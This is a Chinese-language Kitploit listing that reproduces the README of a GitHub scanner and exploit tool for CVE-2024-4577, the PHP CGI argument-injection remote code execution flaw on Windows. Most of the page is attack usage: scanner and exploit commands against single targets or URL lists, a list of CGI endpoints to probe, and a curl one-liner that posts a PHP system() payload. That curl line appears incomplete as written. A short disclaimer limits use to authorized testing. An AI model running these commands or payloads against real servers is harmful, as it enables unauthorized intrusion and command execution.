Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/r0otk3r/cve-2024-4577
漏洞扫描器漏洞利用Web应用程序漏洞利用渗透测试命令与控制学习与教育
GitHubr0otk3r/cve-2024-4577

CVE-2024-4577

CVE-2024-4577 的扫描与利用工具,该漏洞为 PHP CGI 参数注入漏洞,可在 Windows 系统上实现远程代码执行。包含检测与命令执行模块。

查看仓库
31年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-4577 - PHP CGI 参数注入 RCE

概述

CVE-2024-4577 是一个严重的 PHP CGI 参数注入漏洞,影响在 Windows 系统上以 CGI 模式运行 PHP 的环境。该漏洞允许远程攻击者通过特制 URL 向 PHP 命令行 注入参数,从而导致 远程代码执行(RCE)。

本仓库包含:

  • CVE-2024-4577.py:用于检测易受影响目标的 扫描器。
  • exploit.py:一个 漏洞利用工具,可向易受攻击的服务器发送 PHP 代码并执行系统命令。

⚠️ 免责声明
本项目仅用于 教育和授权测试。任何滥用此代码的行为均与作者无关。请负责任地使用,并且仅在你拥有或获得明确测试许可的环境中使用。


环境要求

  • Python 3.x
  • requests 库

安装依赖:

root@kitploit:~
pip install -r requirements.txt

扫描器用法

检测目标是否存在 CVE-2024-4577 漏洞:

单个目标

root@kitploit:~
python3 CVE-2024-4577.py -u http://target.com

1

从文件读取多个目标

root@kitploit:~
python3 CVE-2024-4577.py -f urls.txt

2

自定义路径(可选)

root@kitploit:~
python3 CVE-2024-4577.py -u http://target.com -p /custom/path.php

易受攻击路径示例

扫描器和漏洞利用工具会测试常见的 CGI 端点,例如:

root@kitploit:~
/php-cgi/php-cgi.exe
/index.php
/test.php
/test.hello

该载荷可绕过 cgi.force_redirect,并通过 php://input 前置注入恶意 PHP 代码。


漏洞利用用法

在易受攻击的目标上执行任意系统命令:

单个目标

root@kitploit:~
python3 exploit.py -u http://target.com -c "id"

4

从文件读取多个目标

root@kitploit:~
python3 exploit.py -f urls.txt -c "id"

5

使用 curl

你也可以手动使用 curl 来利用该漏洞

root@kitploit:~
curl -X POST http://target.com/php-cgi/php-cgi.exe -d "<?php system('uname -a'); ?>"

这会发送一个在服务器上执行 uname -a 的 PHP 载荷,并返回输出结果。

3

许可证

本代码以 MIT 许可证发布。更多信息请参阅 LICENSE。


官方渠道

  • YouTube @rootctf
  • X @r0otk3r
下载工具